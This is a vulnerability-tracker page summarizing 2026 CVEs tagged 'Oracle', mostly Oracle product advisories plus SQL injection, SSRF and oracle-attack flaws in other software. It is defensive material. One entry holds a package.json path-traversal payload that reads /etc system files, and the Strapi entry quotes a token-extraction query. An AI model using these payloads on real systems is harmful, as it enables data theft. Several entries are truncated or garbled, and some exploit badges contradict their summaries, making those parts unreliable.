Skip to main content

Oracle

7770 CVEs vendor

Monthly

CVE-2026-35259 HIGH This Week

Full takeover of Oracle WebLogic Server 14.1.2.0.0 and 15.1.1.0.0 is achievable by remote unauthenticated attackers via the Console component over HTTPS, provided a victim performs an action such as clicking a malicious link. The flaw carries a CVSS 3.1 base score of 8.8 with high impact across confidentiality, integrity, and availability, but exploitation hinges on user interaction. No public exploit identified at time of analysis, and the issue is not currently listed in CISA KEV.

Oracle Weblogic Server Open Redirect
NVD VulDB
CVSS 3.1
8.8
EPSS
0.4%
CVE-2026-35258 HIGH This Week

Cross-scope data compromise in Oracle WebLogic Server 14.1.2.0.0 and 15.1.1.0.0 allows a low-privileged remote attacker over HTTPS to read, create, modify, or delete critical data through the administration Console, provided a separate user is induced to perform an action. The CVSS 3.1 base score of 8.7 reflects high confidentiality and integrity impact with scope change reaching beyond WebLogic itself, and no public exploit identified at time of analysis.

Authentication Bypass Oracle Weblogic Server Open Redirect
NVD VulDB
CVSS 3.1
8.7
EPSS
0.4%
CVE-2026-8443 HIGH This Week

SQL injection in the WP Review Slider Pro WordPress plugin (versions ≤12.6.8) allows authenticated attackers with Subscriber-level access to inject arbitrary SQL via the 'stypes' and 'slocations' JSON parameters of the wppro_get_overall_chart_data AJAX action. Because the vulnerable handler echoes the executed SQL back in its JSON response, attackers gain a built-in oracle that turns blind injection into a near-trivial database extraction primitive. No public exploit identified at time of analysis, but the very low privilege barrier on a default WordPress install makes any exposed site a realistic target.

WordPress SQLi Oracle Wpreviewslider Com
NVD VulDB
CVSS 3.1
8.8
EPSS
0.3%
CVE-2026-48709 Go LOW POC PATCH GHSA Monitor

OliveTin's ValidateArgumentType RPC endpoint exposes action binding IDs and argument configurations to unauthenticated network requesters in all versions prior to 3000.13.0, functioning as an enumeration oracle. The bypass is particularly counterintuitive because it manifests specifically when AuthRequireGuestsToLogin is enabled - the hardened security posture - meaning operators who consciously locked down their instance are the ones exposed. The confidentiality impact is limited to internal action metadata (no credentials, no command execution), and no public exploit has been identified at time of analysis.

Authentication Bypass Oracle Olivetin
NVD GitHub
CVSS 3.1
3.7
EPSS
0.3%
CVE-2026-49952 CRITICAL POC PATCH Act Now

Authentication bypass in Discuz! X5.0 releases 20260320 through 20260501 allows unauthenticated remote attackers to access database backup and restore functionality exposed by dbbak.php. The flaw stems from a shared cryptographic key (CWE-323) between UCenter integration and the backup API, which lets an attacker abuse an encryption oracle in logging_ctl::logging_more() to mint legitimately signed authorization tokens, and chain a race condition to impersonate arbitrary users. Publicly available exploit code exists and an upstream fix has been published on Gitee.

PHP Authentication Bypass Oracle Discuz X5 0
NVD Exploit-DB VulDB
CVSS 4.0
9.3
EPSS
0.4%
CVE-2026-46371 Go MEDIUM PATCH GHSA This Month

Blind SQL injection in Fleet MDM's Apple MDM commands endpoint allows authenticated Observer-role users to exfiltrate sensitive database column values - including host enrollment secrets, node_key, orbit_node_key, and APNS tokens - via a cursor-based binary search oracle. The `GET /api/v1/fleet/mdm/apple/commands` endpoint accepted an unsanitized `order_key` parameter injected directly into an SQL ORDER BY clause without column validation, exposing all columns on the joined `hosts` and `nano_enrollments` tables. Extracted node_key values enable full host impersonation against Fleet's osquery and Orbit endpoints, making the effective impact materially higher than the 6.5 CVSS base score implies. No public exploit has been identified at time of analysis; vendor-released patch is available in Fleet 4.84.2.

Apple SQLi Oracle
NVD GitHub
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-46370 Go MEDIUM PATCH GHSA This Month

{id}/hosts accepts the attacker-controlled order_key parameter without column allowlist validation, enabling character-by-character secret reconstruction without secrets ever appearing in response bodies. No public exploit has been identified at time of analysis and no CISA KEV listing was provided, but the attack is deterministic and scriptable against any Fleet deployment where Observer role is broadly granted.

SQLi Oracle
NVD GitHub
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-53726 npm MEDIUM PATCH GHSA This Month

Unauthenticated relation membership disclosure in Parse Server allows any client holding only standard public API credentials to read objects linked through a Relation field that is explicitly hidden by protectedFields, or linked to a parent object that is inaccessible under its ACL or class-level permissions. By supplying only a known or guessed owning object's objectId, a remote unauthenticated caller can enumerate all objects in a protected relation or use the $relatedTo operator as a membership oracle - confirming whether a specific child object is privately linked to a given parent. This directly undermines applications that use Parse Server's access control primitives to protect sensitive relationships such as private group memberships, block lists, or account-to-resource associations. No public exploit identified at time of analysis; vendor-released patches exist at versions 8.6.80 and 9.9.1-alpha.6.

Authentication Bypass Node.js Oracle Parse Server
NVD GitHub VulDB
CVSS 4.0
6.9
EPSS
0.1%
CVE-2026-48053 PyPI MEDIUM PATCH GHSA This Month

Server-side request forgery in Kolibri (pip/kolibri <= 0.19.3) allows network-reachable attackers to force the Kolibri server to issue outbound HTTP requests to arbitrary internal hosts, cloud metadata endpoints, and internal services, with JSON response bodies reflected directly to the caller. The primary GET endpoint at /api/auth/remotefacilityuser required no authentication whatsoever, making this exploitable by any party with network access to the Kolibri server. A working proof-of-concept was retained internally by the reporting researcher but was not published; no public exploit code exists and CISA KEV listing has not been identified at time of analysis.

Python Microsoft Docker SSRF Oracle +1
NVD GitHub
CVSS 3.1
5.8
EPSS
0.0%
CVE-2026-35273 CRITICAL POC KEV THREAT NEWS Emergency

Remote takeover of Oracle PeopleSoft Enterprise PeopleTools 8.61 and 8.62 is possible through the Updates Environment Management component via unauthenticated HTTP requests. The CVSS 9.8 vector (AV:N/AC:L/PR:N/UI:N) indicates trivial network-based exploitation against any internet- or intranet-exposed instance, with full confidentiality, integrity, and availability impact. No public exploit identified at time of analysis, but Oracle's 'easily exploitable' language and the unauthenticated nature make this a high-priority patching target.

Oracle Authentication Bypass Peoplesoft Enterprise Peopletools
NVD VulDB GitHub
CVSS 3.1
9.8
EPSS
0.0%
Threat
5.0
CVE-2026-49397 Go MEDIUM PATCH GHSA This Month

Information disclosure in nezha 2.x server monitoring dashboard exposes private services marked with `EnableShowInService: false` to unauthenticated network visitors through two API endpoints that bypass the intended visibility filter. Attackers who can reach the API can enumerate hidden service names, IDs, and per-server timing data by iterating over public server IDs or guessing numeric service IDs - both low-cardinality spaces in typical deployments. No public exploit is required to leverage this; a fully functional proof-of-concept using only standard `curl` commands is documented in the GitHub security advisory GHSA-vrmh-5mmx-hjwx, and the fix is available in version 2.0.14.

Information Disclosure Oracle Microsoft Hashicorp
NVD GitHub
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-45329 MEDIUM This Month

Information disclosure in Espressif ESP-IDF 5.5.4 and 6.0 allows local code in the Rich Execution Environment (REE) to leak TEE-protected memory by passing crafted pointer arguments to ESP-TEE secure-service wrappers. Because TEE hardware peripherals (ECC, SHA, SPI) run in RISC-V M-mode with full address-space access, attackers can coerce them to read from TEE-exclusive memory and return raw bytes, computed functions, or single-bit oracles enabling incremental disclosure of sensitive material. No public exploit identified at time of analysis; vendor-released patches exist in 5.5.5 and 6.0.1.

Information Disclosure Oracle
NVD GitHub VulDB
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-41694 MEDIUM PATCH This Month

Decryption oracle exposure in Spring Security's SAML module allows unauthenticated remote attackers (PR:N, AV:N per CVSS) to submit crafted SAML Responses, LogoutRequests, and LogoutResponses to a Service Provider endpoint and leverage the SP's private key for decryption without presenting a valid XML signature. Affected deployments span Spring Security 5.7.x through 7.0.x that use SAML-based SSO or Single Logout. No public exploit has been identified at time of analysis and EPSS data was not provided, but the attack class (XML encryption oracle) is well-documented in SAML security research and carries meaningful risk in identity-sensitive environments.

Information Disclosure Oracle Jwt Attack Java Spring Security
NVD VulDB HeroDevs
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-50636 HIGH PATCH This Week

SQL injection in LimeSurvey's RemoteControl API (invite_participants and remind_participants methods) allows an authenticated attacker with tokens/update permission on a survey to execute arbitrary stacked SQL queries against the application database. Because PDO emulated prepared statements are enabled and MySQL multi-statements are not disabled, attackers can read administrator bcrypt hashes via time-based blind techniques or directly overwrite credentials for instant account takeover. No public exploit identified at time of analysis; the upstream fix is published as LimeSurvey PR #5031, which replaces unsafe string concatenation with parameterized addInCondition().

Oracle SQLi
NVD GitHub VulDB
CVSS 4.0
8.7
EPSS
0.1%
CVE-2026-47719 npm HIGH GHSA This Week

Server-side request forgery in FUXA SCADA/HMI server (npm package fuxa-server <= 1.1.14-1243) allows unauthenticated remote attackers to connect to the Socket.IO endpoint and coerce the server to issue arbitrary HTTP(S), OPC UA, or ODBC requests with response bodies echoed back to the caller. No public exploit identified at time of analysis, but the GitHub Security Advisory GHSA-w86f-rf9w-h3x6 provides full handler-level reproduction details and the fix is shipped in release v1.3.2.

Oracle SSRF
NVD GitHub
CVSS 3.1
8.2
EPSS
0.1%
CVE-2026-47732 PHP HIGH PATCH GHSA This Week

Sandbox policy bypass in Twig templating engine versions 3.25.0 and earlier allows sandboxed template authors to invoke arbitrary `__toString()` methods on any `Stringable` object reachable in the render context, even when those methods are not allowlisted by `SecurityPolicy::checkMethodAllowed()`. The flaw stems from `SandboxNodeVisitor` only wrapping a hardcoded subset of AST nodes in `CheckToStringNode`, leaving many string-coercion points (conditional expressions, comparison/`matches` operators, tests, ranges, includes, spread arguments) unguarded - and the comparison-operator vector enables byte-by-byte oracle recovery of sensitive object string forms. No public exploit identified at time of analysis; fix shipped in Twig 3.26.0 (also referenced by Symfony's advisory page).

PHP Authentication Bypass Oracle
NVD GitHub
CVSS 4.0
7.1
EPSS
0.0%
CVE-2026-47379 npm MEDIUM PATCH GHSA This Month

Timing oracle in NocoDB's shared-view password authentication allows a network-positioned attacker to recover legacy plaintext passwords character-by-character through response time measurement. Affected installations are those where shared-view passwords were set before the bcrypt migration - passwords stored as bcrypt hashes (prefixed $2a$/$2b$) were never vulnerable. The strict-equality (===) JavaScript comparison leaked both password length and per-character prefix timing, enabling incremental brute-force without any prior authentication. No public exploit has been identified at time of analysis, and the vulnerability is not listed in CISA KEV.

Information Disclosure Oracle
NVD GitHub
CVSS 4.0
6.9
EPSS
0.1%
CVE-2026-48102 LOW PATCH Monitor

Heap out-of-bounds read in 7-Zip versions 9.11 through 26.00 exposes up to 3 bytes of heap memory during UDF disc image parsing, triggering when a user opens or extracts a crafted .iso or .udf file. Impact is constrained to a 1-bit information-disclosure oracle per out-of-bounds byte (inferred from open/fail behavior) and potential denial of service under hardened allocators; no write primitive exists. No public exploit code or CISA KEV listing has been identified at time of analysis, and the CVSS Low score of 3.1 accurately reflects the limited real-world severity.

Denial Of Service Information Disclosure Oracle Buffer Overflow
NVD GitHub VulDB
CVSS 3.1
3.1
EPSS
0.0%
CVE-2026-47703 Go MEDIUM PATCH GHSA This Month

DNS transaction ID entropy collapse in AdGuard Home (≤v0.107.74) and its underlying dnsproxy library (≤v0.81.2) reduces the backend UDP forwarding tuple from two random variables to one: the DNS ID is deterministically 0 on every client-triggered DoQ-to-UDP hop, leaving only the UDP source port as the sole remaining entropy variable. An off-path attacker who can inject spoofed ICMP error messages toward the resolver's egress address can exploit a reliable source-port oracle - confirmed across four consecutive runs for both products - to identify the correct backend socket state before injecting a forged DNS response, placing this attack in the same threat-model class as SAD DNS and TUdoor. No public exploit confirmed at time of analysis beyond the working oracle reproducer included in the advisory disclosure; the advisory is not listed in CISA KEV.

OpenSSL Race Condition Oracle Information Disclosure Docker
NVD GitHub
CVSS 4.0
6.3
EPSS
0.0%
CVE-2026-43926 MEDIUM PATCH This Month

Password reset token enumeration in FOSSBilling prior to 0.8.0 exposes three authentication endpoints - including the elevated-privilege admin reset at `/staff/email/:hash` - to unlimited brute-force guessing due to a rate limiter architecturally scoped exclusively to `/api/*` routes. The confirmation endpoint acts as a CWE-204 oracle, returning distinguishable HTTP responses (200 for valid tokens, 302 redirect for invalid), allowing an unauthenticated remote attacker to probe token validity without throttling, lockout, or attempt counting. Practical exploitation risk is substantially reduced by 256-bit token entropy (`hash('sha256', random_bytes(32))`) combined with a 15-minute expiry window, which is accurately reflected in the CVSS 4.0 AC:H/AT:P scoring; no public exploit or CISA KEV listing has been identified at time of analysis.

Information Disclosure Oracle Apache Nginx Fossbilling
NVD GitHub
CVSS 4.0
6.3
EPSS
0.0%
CVE-2026-46344 MEDIUM PATCH This Month

Out-of-bounds read in liboqs prior to 0.16.0 affects the XMSS and XMSS^MT stateful signature verification routines, exploitable by any unauthenticated remote attacker who can supply a crafted public key to a verifying process. The flaw arises when a correctly-sized signature buffer is paired with a public key whose OID bytes reference a different XMSS parameter set, causing the library to derive a larger sig_bytes value and index past the end of the caller-supplied buffer, with the primary observable effect being a process crash. No active exploitation is confirmed (not in CISA KEV) and no independently published exploit has been identified at time of analysis, though a proof-of-concept scenario is embedded in the upstream fix commit's test suite.

Denial Of Service Information Disclosure Oracle Buffer Overflow Red Hat +1
NVD GitHub
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-44518 MEDIUM PATCH This Month

Out-of-bounds read in liboqs prior to 0.16.0 allows a remote unauthenticated attacker to crash the verifying process by supplying a truncated signature buffer to the XMSS or XMSS^MT stateful signature verification function. The missing caller-supplied length validation causes the implementation to read past the end of the buffer; the overread bytes feed into an internal hash computation only and are not returned to the caller, eliminating any data-leakage oracle. The primary real-world impact is a denial-of-service crash if the overread crosses an unmapped memory page. No public exploit or CISA KEV listing is identified at time of analysis.

Denial Of Service Oracle Buffer Overflow Red Hat Suse
NVD GitHub
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-46843 MEDIUM This Month

Partial denial-of-service in Oracle REST Data Services (ORDS) versions 24.2.0 through 26.1.0 allows unauthenticated remote attackers to degrade availability of the Core component via HTTPS. The CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms the vulnerability is trivially reachable with no authentication, no user interaction, and no special conditions, making automated scanning and opportunistic exploitation straightforward despite the limited availability-only impact. No public exploit code and no CISA KEV listing have been identified at time of analysis, and Oracle disclosed this through its May 2026 Critical Patch Update.

Denial Of Service Oracle
NVD VulDB
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-46842 MEDIUM This Month

Unauthenticated network-based data integrity compromise in Oracle REST Data Services (ORDS) versions 24.2.0 through 26.1.0 allows remote attackers to perform unauthorized insert, update, or delete operations against accessible ORDS data via HTTPS. The vulnerability resides in the Core component and is classified as an Authentication Bypass, meaning the access control enforcement in ORDS's request pipeline can be circumvented without credentials. No public exploit code or active exploitation (CISA KEV) has been identified at time of analysis, though the CVSS vector (AV:N/AC:L/PR:N/UI:N) indicates the exploit path is straightforward for any network-adjacent attacker.

Authentication Bypass Oracle
NVD VulDB
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-46841 MEDIUM This Month

Unauthorized read access in Oracle REST Data Services (ORDS) versions 24.2.0 through 26.1.0 allows unauthenticated remote attackers to bypass authentication controls via HTTPS and retrieve a subset of accessible data. The CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms no special conditions are needed - any network-reachable instance is potentially exploitable without credentials. No public exploit code or CISA KEV listing has been identified at time of analysis, and EPSS data was not available in the provided intelligence, limiting exploitation urgency assessment.

Oracle Information Disclosure
NVD VulDB
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-46840 CRITICAL NEWS Act Now

Remote takeover of Oracle REST Data Services (ORDS) versions 24.2.0 through 26.1.0 allows unauthenticated attackers to compromise the service over HTTPS and pivot into adjacent products due to a scope-changing flaw. With a maximum CVSS 10.0 score and trivial exploitability (AV:N/AC:L/PR:N/UI:N), this Backend-as-a-Service component vulnerability poses critical risk, though no public exploit identified at time of analysis and no EPSS or CISA KEV signal has been provided in the available data.

Oracle Authentication Bypass
NVD VulDB
CVSS 3.1
10.0
EPSS
0.0%
CVE-2026-46839 CRITICAL Act Now

Privilege escalation to full takeover in Oracle REST Data Services (ORDS) versions 24.2.0 through 26.1.0 allows a low-privileged remote attacker over HTTPS to fully compromise the service and pivot into adjacent products via a CVSS scope change. CVSS 3.1 base score is 9.9 with attack complexity rated low, and no public exploit identified at time of analysis. The scope-change designation is the key differentiator - successful exploitation extends beyond ORDS itself into systems it fronts, most notably the backing Oracle Database.

Oracle Authentication Bypass
NVD VulDB
CVSS 3.1
9.9
EPSS
0.0%
CVE-2026-46837 HIGH This Week

Full product takeover of Oracle Flow Manufacturing (versions 12.2.9 through 12.2.15) is achievable by a low-privileged remote attacker via SQL-based network access, per Oracle's advisory. The flaw scores CVSS 8.8 with high impact across confidentiality, integrity, and availability, and no public exploit has been identified at time of analysis. As a component of Oracle E-Business Suite, exploitation provides an attacker with control over a business-critical manufacturing execution system.

Oracle Privilege Escalation
NVD VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-46835 HIGH This Week

Remote denial of service in Oracle Database Server 23.4.0 through 23.26.2 allows unauthenticated network attackers to crash or hang the Net Service component via crafted TLS traffic. The flaw scores CVSS 7.5 with availability-only impact and was disclosed by Oracle in the May 2026 Critical Patch Update; no public exploit identified at time of analysis.

Denial Of Service Oracle
NVD VulDB
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-46834 HIGH This Week

Remote denial-of-service in Oracle Database Server's Net Service component (versions 23.4.0 through 23.26.2) allows unauthenticated attackers with TLS network access to hang or repeatedly crash the listener, producing a complete DoS of database connectivity. The flaw is rated CVSS 7.5 (availability-only) and was disclosed by Oracle in the May 2026 Critical Patch Update; no public exploit identified at time of analysis and the issue is not currently listed in CISA KEV.

Denial Of Service Oracle
NVD VulDB
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-46833 CRITICAL NEWS Act Now

Net Service takeover in Oracle Database Server 23.4.0 through 23.26.2 allows unauthenticated remote attackers reaching the TLS-protected Net Service listener to fully compromise confidentiality, integrity, and availability, with scope change indicating impact on adjacent components. CVSS 9.0 reflects high impact tempered by high attack complexity (AC:H), and no public exploit identified at time of analysis. Reported and tracked in Oracle's May 2026 Critical Patch Update advisory.

Information Disclosure Oracle
NVD VulDB
CVSS 3.1
9.0
EPSS
0.0%
CVE-2026-46830 MEDIUM This Month

Unauthorized read access in Oracle REST Data Services (ORDS) versions 24.2.0 through 26.1.0 is achievable by unauthenticated remote attackers via the Mongoapi component over HTTPS. The vulnerability is tagged as an Authentication Bypass, indicating the Mongoapi endpoint fails to enforce access controls, exposing a subset of data accessible through that interface. No public exploit code and no CISA KEV listing exist at time of analysis, but the CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms low-complexity, zero-authentication exploitation is feasible at scale.

Oracle Information Disclosure
NVD VulDB
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-46829 HIGH This Week

Remote denial-of-service in Oracle REST Data Services (ORDS) versions 24.2.0 through 26.1.0 allows unauthenticated network attackers to cause a complete hang or repeatable crash of the service via the Mongoapi component over HTTPS. The vulnerability is rated CVSS 7.5 with availability-only impact and no public exploit identified at time of analysis, but the unauthenticated, low-complexity attack profile makes it operationally significant for any internet-exposed ORDS instance.

Denial Of Service Oracle
NVD
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-46828 HIGH This Week

Unauthorized data access and modification in Oracle Payroll (a module of Oracle E-Business Suite) versions 12.2.3 through 12.2.15 allows a low-privileged authenticated attacker with HTTP network access to read, create, delete, or modify any data accessible to the Oracle Payroll application. The flaw carries a CVSS 8.1 due to high confidentiality and integrity impact with low attack complexity, but no public exploit identified at time of analysis and it is not listed in CISA KEV. The advisory was published as part of Oracle's Critical Patch Update cycle (CPU May 2026).

Authentication Bypass Oracle
NVD
CVSS 3.1
8.1
EPSS
0.0%
CVE-2026-46827 HIGH This Week

Account takeover in Oracle Payroll (Self Service Manager component) of Oracle E-Business Suite versions 12.2.3 through 12.2.15 allows a low-privileged authenticated attacker to fully compromise the Payroll module over HTTP. The CVSS 3.1 base score of 8.8 reflects high impacts to confidentiality, integrity, and availability, and Oracle has issued a fix in the May 2026 Critical Patch Update. No public exploit identified at time of analysis.

Oracle Privilege Escalation
NVD VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-46826 HIGH This Week

Account takeover in Oracle Payroll (component: Internal Operations) within Oracle E-Business Suite versions 12.2.3 through 12.2.15 allows a low-privileged remote attacker with HTTPS network access to fully compromise the Payroll application. The CVSS 8.8 vector indicates low complexity and no user interaction, meaning any authenticated EBS user can pivot to full confidentiality, integrity, and availability impact on Payroll. No public exploit identified at time of analysis, but the issue was disclosed in Oracle's Critical Patch Update advisory and warrants prompt patching given the sensitivity of payroll data.

Oracle Authentication Bypass
NVD VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-46824 CRITICAL Act Now

Account takeover in Oracle Universal Work Queue (component: Work Provider Site Level Administration) within Oracle E-Business Suite versions 12.2.3 through 12.2.15 allows low-privileged remote attackers over HTTP to fully compromise the product with confidentiality, integrity, and availability impact. The CVSS 9.9 score reflects a scope-changing flaw whose blast radius extends to other Oracle E-Business Suite products beyond Universal Work Queue itself. No public exploit identified at time of analysis, but the low attack complexity and minimal privilege requirement make this a high-priority Oracle Critical Patch Update item.

Oracle Privilege Escalation
NVD VulDB
CVSS 3.1
9.9
EPSS
0.0%
CVE-2026-46823 HIGH This Week

Unauthorized data access in Oracle Public Sector Financials (International), a module of Oracle E-Business Suite versions 12.2.6 through 12.2.15, allows low-privileged remote attackers to read sensitive data across module boundaries due to a flaw in the Authorization component. The scope-changed CVSS 7.7 vector indicates exploitation can affect resources beyond the vulnerable component itself, expanding the blast radius to other EBS data. No public exploit identified at time of analysis, and the issue is not listed in CISA KEV.

Authentication Bypass Oracle
NVD
CVSS 3.1
7.7
EPSS
0.0%
CVE-2026-46822 CRITICAL Act Now

Account takeover in Oracle iAssets (part of Oracle E-Business Suite versions 12.2.3 through 12.2.15) allows a low-privileged attacker with HTTP network access to fully compromise the iAssets component and pivot into adjacent products via a scope change. The 9.9 CVSS score reflects high impact on confidentiality, integrity, and availability combined with low attack complexity; no public exploit identified at time of analysis, but Oracle's inclusion in the May 2026 Critical Patch Update warrants immediate attention.

Oracle Authentication Bypass
NVD VulDB
CVSS 3.1
9.9
EPSS
0.0%
CVE-2026-46821 HIGH This Week

Unauthorized data access in Oracle E-Business Suite's Financials Common Modules (versions 12.2.3 through 12.2.15) allows low-privileged remote attackers to read sensitive data via HTTP, with a scope change that extends impact beyond the vulnerable component to other Oracle products. The flaw carries a CVSS 3.1 base score of 7.7 reflecting high confidentiality impact, but no public exploit has been identified at time of analysis and the issue is not currently listed in CISA KEV.

Authentication Bypass Oracle
NVD
CVSS 3.1
7.7
EPSS
0.0%
CVE-2026-46820 HIGH This Week

Cross-product data exposure in Oracle Financials Common Modules (E-Business Suite versions 12.2.3 through 12.2.15) allows a low-privileged authenticated attacker to access or modify sensitive financial data over HTTP. The scope-changed nature of the flaw means exploitation impacts additional Oracle products beyond Financials Common Modules itself. No public exploit identified at time of analysis, and the issue is not currently listed in CISA KEV.

Authentication Bypass Oracle
NVD
CVSS 3.1
8.5
EPSS
0.0%
CVE-2026-46819 CRITICAL NEWS Act Now

Remote unauthenticated compromise of Oracle Internet Procurement Connector (a component of Oracle E-Business Suite versions 12.2.3 through 12.2.15) allows attackers to read, modify, create, or delete all data accessible to the component over HTTP. The CVSS 9.1 score reflects high confidentiality and integrity impact with low attack complexity and no privileges or user interaction required. No public exploit identified at time of analysis, but the trivial exploitability profile combined with EBS's history of being targeted (e.g., CVE-2025 Cl0p campaigns) makes this a priority patch for any internet-exposed deployment.

Authentication Bypass Oracle
NVD
CVSS 3.1
9.1
EPSS
0.0%
CVE-2026-46818 HIGH This Week

Unauthorized data modification and disclosure in Oracle E-Business Suite (Oracle Payments component, File Transmission) versions 12.2.3 through 12.2.15 allows unauthenticated remote attackers over HTTPS to read, alter, create, or delete all Oracle Payments-accessible data. The flaw carries a CVSS 3.1 base score of 7.4 with high confidentiality and integrity impact but no availability impact, and is rated high attack complexity. No public exploit identified at time of analysis, and it is not currently listed in CISA KEV.

Authentication Bypass Oracle
NVD VulDB
CVSS 3.1
7.4
EPSS
0.0%
CVE-2026-46817 CRITICAL POC KEV THREAT NEWS Emergency

Remote takeover of Oracle Payments in Oracle E-Business Suite versions 12.2.3 through 12.2.15 is possible via the File Transmission component, allowing unauthenticated network-based attackers to fully compromise confidentiality, integrity, and availability (CVSS 9.8). The flaw is described by Oracle as easily exploitable over HTTP with no user interaction, and no public exploit identified at time of analysis. Tagged as Information Disclosure and listed in Oracle's May 2026 Critical Patch Update advisory.

Oracle Privilege Escalation Oracle Payments
NVD VulDB
CVSS 3.1
9.8
EPSS
0.0%
Threat
5.0
CVE-2026-46775 CRITICAL Act Now

Takeover of Oracle REST Data Services (ORDS) versions 24.2.0 through 26.1.0 is achievable by a low-privileged remote attacker over HTTPS, with scope-changed impact extending to additional Oracle products beyond ORDS itself. Oracle rates this 9.9 CVSS due to the combination of low attack complexity, minimal privilege requirement, and full confidentiality/integrity/availability compromise; no public exploit identified at time of analysis, but the easy exploitability noted in Oracle's advisory makes this a high-priority patch target.

Oracle Authentication Bypass
NVD VulDB
CVSS 3.1
9.9
EPSS
0.0%
CVE-2026-35277 HIGH This Week

Unauthorized data access and modification in Oracle REST Data Services (ORDS) versions 24.2.0 through 26.1.0 allows low-privileged remote attackers to read, create, modify, or delete any data accessible via the service. The flaw is network-reachable over HTTPS with low attack complexity (CVSS 8.1) and was disclosed by Oracle in the May 2026 Critical Patch Update. No public exploit has been identified at time of analysis, and the vulnerability is not currently listed in CISA KEV.

Authentication Bypass Oracle
NVD VulDB
CVSS 3.1
8.1
EPSS
0.0%
CVE-2026-35266 HIGH This Week

Cross-product compromise in Oracle REST Data Services (ORDS) versions 24.2.0 through 26.1.0 allows a low-privileged remote attacker who can lure an authenticated user into interacting with a crafted request to gain high-impact read and write access to ORDS-accessible data and cause partial denial of service. Because the CVSS scope is Changed (S:C), successful exploitation may also impact downstream Oracle components beyond ORDS itself. There is no public exploit identified at time of analysis and the issue is not listed in CISA KEV, but the 7.9 base score combined with scope change warrants prompt patching.

Authentication Bypass Denial Of Service Oracle CSRF
NVD
CVSS 3.1
7.9
EPSS
0.0%
CVE-2026-34311 CRITICAL NEWS Act Now

Remote takeover of Oracle Hospitality OPERA 5 Property Services (versions 5.6.19.24, 5.6.22, 5.6.25.19, 5.6.27.6, and 5.6.28) is achievable by unauthenticated network attackers over HTTP, per Oracle's May 2026 CPU. With CVSS 9.8 and full CIA impact, this is a critical hospitality-sector exposure, though no public exploit is identified at time of analysis and KEV status is not present. EPSS data was not supplied, so probability-of-exploitation cannot be quantified.

Information Disclosure Oracle
NVD VulDB
CVSS 3.1
9.8
EPSS
0.0%
CVE-2025-69600 HIGH This Week

Local privilege escalation via command injection in Raynet rvia (RayVentory) 12.6.4392.49-amd64.deb allows authenticated local users to achieve arbitrary code execution by exploiting an improperly terminated find query the application uses to locate the Java runtime. The flaw is reachable through the getconfig command, the upload URL argument, and the oracle -o flag, and publicly available exploit code exists on GitHub although no active exploitation has been observed.

Java Command Injection RCE Oracle
NVD GitHub
CVSS 3.1
7.8
EPSS
0.1%
CVE-2026-46403 Go MEDIUM PATCH GHSA This Month

KVM read-only execution isolation bypass in klever-go allows a low-privileged smart contract actor to commit irreversible contract deletion side effects through the `ExecuteReadOnlyWithTypedArguments` hook, violating the expected non-mutating guarantee of read-only calls. Affected are all deployments of klever-go prior to v1.7.17 where smart contract workflows invoke callees through read-only execution paths. A confirmed proof-of-concept was included with the original disclosure, demonstrating that `DeletedAccounts` in VM output transitions from zero entries to one after a read-only nested call - no public exploit is separately circulating and CISA KEV listing is not confirmed at time of analysis.

Oracle Authentication Bypass
NVD GitHub
CVSS 3.1
6.3
EPSS
0.1%
CVE-2026-46481 Maven HIGH PATCH GHSA This Week

Sensitive credential disclosure in OpenMetadata 1.12.1 allows any authenticated non-admin SSO user to retrieve cleartext database passwords and a long-lived ingestion-bot JWT by triggering a TEST_CONNECTION workflow via POST /api/v1/automations/workflows. The HTTP 201 response unexpectedly echoes the stored Oracle/database secret and the bot's bearer token, which can then be replayed against service APIs with bot-level privileges. A detailed proof-of-concept is published in the GitHub Security Advisory (GHSA-9vmh-whc4-7phg), so publicly available exploit code exists; no public exploit identified at time of analysis in CISA KEV.

Microsoft Information Disclosure Apache Oracle
NVD GitHub VulDB
CVSS 3.1
8.3
EPSS
0.0%
CVE-2026-45709 Go MEDIUM PATCH GHSA This Month

{id}/html-check`, making this a zero-credential pivot primitive into internal infrastructure. Publicly available exploit code exists; no confirmed active exploitation in CISA KEV at time of analysis.

Java Docker SSRF Redis Oracle
NVD GitHub
CVSS 3.1
5.8
EPSS
0.0%
CVE-2026-27886 npm CRITICAL PATCH GHSA Act Now

Boolean-oracle information disclosure in Strapi Content API allows remote unauthenticated attackers to extract admin password-reset tokens and achieve full administrative account takeover. Strapi versions 4.0.0 through 5.36.1 fail to sanitize relational query parameters on public content-type endpoints. By crafting `where` filters that traverse into joined `admin_users` table columns (e.g., `where[updatedBy][resetPasswordToken][$startsWith]=a`), attackers perform character-by-character oracle attacks against private admin fields, then use the extracted reset token to hijack administrator accounts. WildWest CyberSecurity reports this critical vulnerability with CVSS 9.3, affecting all Strapi deployments with public content-types containing admin-relation fields (`updatedBy`, `createdBy`, `publishedBy`). Vendor-released patch available in version 5.37.0. No active exploitation or public POC identified at time of analysis.

Oracle Path Traversal
NVD GitHub VulDB
CVSS 4.0
9.2
EPSS
0.1%
CVE-2026-44594 Go HIGH PATCH GHSA This Week

{ "name": "chess-sec-utils1", "version": "1.0.6", "main": "index.js", "type": "module", "browser": { "./d1.txt": "../../../../../../../../etc/hostname", "./d2.json": "../../../../../../../../etc/os-release", "./d3.json": "../../../../../../../../etc/environment" } }

Debian Ubuntu Oracle Node.js Path Traversal
NVD GitHub
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-41195 MEDIUM PATCH This Month

